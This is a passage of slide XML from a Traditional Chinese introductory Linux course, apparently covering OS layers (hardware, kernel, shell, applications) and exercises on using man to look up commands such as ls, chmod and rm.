                <a:ext cx="184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4527720" y="4584600"/>
              <a:ext cx="3772080" cy="51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511520" y="4521240"/>
                <a:ext cx="380412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2014560" y="1928880"/>
              <a:ext cx="1629000" cy="100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998720" y="1865160"/>
                <a:ext cx="16606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2050200" y="1864440"/>
              <a:ext cx="1672200" cy="648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034360" y="1801080"/>
                <a:ext cx="170388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2014560" y="1778760"/>
              <a:ext cx="1357560" cy="78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998720" y="1715040"/>
                <a:ext cx="1389240" cy="20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703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何謂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87042" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1619250" y="5300663"/>
            <a:ext cx="3529013" cy="503237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="F0FE6A"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="6F753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裸機</a:t>
            </a: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(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" 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電腦硬體</a:t>
            </a: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)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="zh-TW" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean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3" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1652588" y="2636838"/>
            <a:ext cx="647700" cy="15843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4" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2300288" y="2636838"/>
            <a:ext cx="649287" cy="158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5" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2949575" y="2636838"/>
            <a:ext cx="2232025" cy="1584325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6" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1652588" y="4221163"/>
            <a:ext cx="3529012" cy="25241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7" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3021013" y="3284538"/>
            <a:ext cx="2160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sz="16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應用軟體</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="16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(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" sz="16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應用程式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="16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標楷體" pitchFamily="65" charset="-120"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="zh-TW" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean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8" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2260997" y="2781300"/>
            <a:ext cx="61555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sz="14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Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>作業系統所提供之應用軟體</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean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9" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1613297" y="2781300"/>
            <a:ext cx="61555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sz="14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Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>作業系統操作環境</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean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87051" name="Group 47"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1835150" y="1557338"/>
            <a:ext cx="1008063" cy="960437"/>
            <a:chOff x="1247" y="981"/>
            <a:chExt cx="635" cy="605"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="87052" name="Object 40"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="1292" y="981"/>
            <a:ext cx="344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54" name="Visio" r:id="rId5" imgW="1129856" imgH="1682353" progId="Visio.Drawing.11">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Visio" r:id="rId5" imgW="1129856" imgH="1682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981"/>
                          <a:ext cx="344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53" name="Text Box 46"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1247" y="1374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標楷體" pitchFamily="65" charset="-120"/>
                </a:rPr>
                <a:t>使用者</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" 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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="87054" name="Group 57"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7164388" y="3357563"/>
            <a:ext cx="1223962" cy="998537"/>
            <a:chOff x="4249" y="2115"/>
            <a:chExt cx="771" cy="629"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="87055" name="Object 55"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="4422" y="2115"/>
            <a:ext cx="344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55" name="Visio" r:id="rId7" imgW="1129856" imgH="1682353" progId="Visio.Drawing.11">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Visio" r:id="rId7" imgW="1129856" imgH="1682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2115"/>
                          <a:ext cx="344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56" name="Text Box 56"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4249" y="2532"/>
              <a:ext cx="7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標楷體" pitchFamily="65" charset="-120"/>
                </a:rPr>
                <a:t>程式設計師</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" 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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="87057" name="Group 60"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5741988" y="2636838"/>
            <a:ext cx="990600" cy="2087562"/>
            <a:chOff x="3341" y="1661"/>
            <a:chExt cx="624" cy="1315"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87058" name="Text Box 58"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3341" y="1661"/>
              <a:ext cx="310" cy="131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2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="10000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-ea"/>
                  <a:ea typeface="+mj-ea"/>
                </a:rPr>
                <a:t>語言轉譯程式</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" 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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87059" name="Text Box 59"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3655" y="1661"/>
              <a:ext cx="310" cy="131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2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="10000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-ea"/>
                  <a:ea typeface="+mj-ea"/>
                </a:rPr>
                <a:t>程式開發軟體</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-TW" sz="1800" b="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latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87060" name="AutoShape 61"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2124075" y="4797425"/>
            <a:ext cx="215900" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 32352"/>
              <a:gd name="adj2" fmla="val 51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61" name="AutoShape 64"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="5340350" y="4257675"/>
            <a:ext cx="215900" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 32352"/>
              <a:gd name="adj2" fmla="val 51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62" name="AutoShape 65"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6911975" y="3608388"/>
            <a:ext cx="215900" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 32352"/>
              <a:gd name="adj2" fmla="val 51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63" name="AutoShape 66"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5219700" y="3429000"/>
            <a:ext cx="431800" cy="215900"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 32352"/>
              <a:gd name="adj2" fmla="val 705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87064" name="Group 67"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2843213" y="1557338"/>
            <a:ext cx="1008062" cy="960437"/>
            <a:chOff x="1247" y="981"/>
            <a:chExt cx="635" cy="605"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="87065" name="Object 68"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="1292" y="981"/>
            <a:ext cx="344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56" name="Visio" r:id="rId8" imgW="1129856" imgH="1682353" progId="Visio.Drawing.11">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Visio" r:id="rId8" imgW="1129856" imgH="1682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981"/>
                          <a:ext cx="344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66" name="Text Box 69"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1247" y="1374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標楷體" pitchFamily="65" charset="-120"/>
                </a:rPr>
                <a:t>使用者</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" 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sp>
        <p:nvSpPr>
          <p:cNvPr id="87067" name="AutoShape 70"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3132138" y="4797425"/>
            <a:ext cx="215900" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 32352"/>
              <a:gd name="adj2" fmla="val 51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87068" name="Group 71"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3851275" y="1557338"/>
            <a:ext cx="1008063" cy="960437"/>
            <a:chOff x="1247" y="981"/>
            <a:chExt cx="635" cy="605"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="87069" name="Object 72"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="1292" y="981"/>
            <a:ext cx="344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57" name="Visio" r:id="rId9" imgW="1129856" imgH="1682353" progId="Visio.Drawing.11">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Visio" r:id="rId9" imgW="1129856" imgH="1682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981"/>
                          <a:ext cx="344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70" name="Text Box 73"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1247" y="1374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標楷體" pitchFamily="65" charset="-120"/>
                </a:rPr>
                <a:t>使用者</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" 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sp>
        <p:nvSpPr>
          <p:cNvPr id="87071" name="AutoShape 74"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4140200" y="4797425"/>
            <a:ext cx="215900" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 32352"/>
              <a:gd name="adj2" fmla="val 51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</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/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1652588" y="4473574"/>
            <a:ext cx="3529012" cy="30428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sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SHELL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>溝通介面 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ex. TCSH,BASH)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>作業系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>核心</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>,KERNEL)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="新細明體" pitchFamily="18" charset="-12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筆跡 3"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="195840" y="320040"/>
              <a:ext cx="2234160" cy="24822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80000" y="256680"/>
                <a:ext cx="2265840" cy="260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筆跡 4"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1593720" y="4349880"/>
              <a:ext cx="3638520" cy="4608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577880" y="4286520"/>
                <a:ext cx="367020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筆跡 5"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1606680" y="4682880"/>
              <a:ext cx="3076920" cy="594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590840" y="4619520"/>
                <a:ext cx="310860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筆跡 6"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1404360" y="5016240"/>
              <a:ext cx="78840" cy="9406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388520" y="4952520"/>
                <a:ext cx="110520" cy="10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筆跡 7"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1469520" y="5016240"/>
              <a:ext cx="2867760" cy="144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453680" y="4952520"/>
                <a:ext cx="2899440" cy="27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" name="筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4669920" y="5068440"/>
              <a:ext cx="856080" cy="11304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654080" y="5004720"/>
                <a:ext cx="887760" cy="125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0" name="筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="986400" y="4493520"/>
              <a:ext cx="529200" cy="5947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970560" y="4430160"/>
                <a:ext cx="560880" cy="72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1" name="筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1032120" y="4898520"/>
              <a:ext cx="209160" cy="235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016280" y="4835160"/>
                <a:ext cx="240840" cy="36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869926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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>查詢指令用法，按下空白鍵進行之動作為何</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>查詢指令用法，按下 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>page up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>進行之動作為何</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>查詢指令用法，按下 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>page down </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>進行之動作為何</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>查詢指令用法，按下 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>home </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>進行之動作為何</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>查詢指令用法，按下 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>end </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>進行之動作為何？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06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以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>查看指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>”ls”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>目前游標處向下搜尋 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>“list”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>這個字</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>查看指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
